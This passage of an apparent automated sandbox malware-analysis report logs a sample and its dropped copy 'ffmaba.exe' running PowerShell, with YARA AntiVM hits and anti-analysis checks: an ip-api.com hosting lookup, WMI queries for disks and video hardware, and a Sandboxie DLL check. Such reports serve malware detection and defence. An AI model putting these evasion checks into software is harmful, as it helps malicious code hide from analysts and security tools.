                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 7784, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 2300, type: MEMORYSTR
                Check if machine is in data center or colocation facility
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 57F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 67F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 6A20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 7A20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: 4BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeMemory allocated: 2550000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeMemory allocated: 27D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeMemory allocated: 2550000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeMemory allocated: 5A80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeMemory allocated: 6A80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeMemory allocated: 5A80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2D80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2D80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 4D80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6180000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 7180000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 73C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 83C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 9EA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: AEA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6930000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 1070000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2B90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 1070000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 5E00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6E00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 5E00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2EC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 7220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2410000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 25F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 45F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 5940000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6940000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 5940000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 11D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2E60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 2C40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6120000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 7120000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMemory allocated: 6120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599782
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599532
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599063
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598938
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598813
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594096
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 593969
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6893Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2756Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeWindow / User API: threadDelayed 6850Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeWindow / User API: threadDelayed 2982Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6689Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3097Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6101Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3646Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7889
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWindow / User API: threadDelayed 6187
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWindow / User API: threadDelayed 3589
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9158
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7736
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1950
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8662
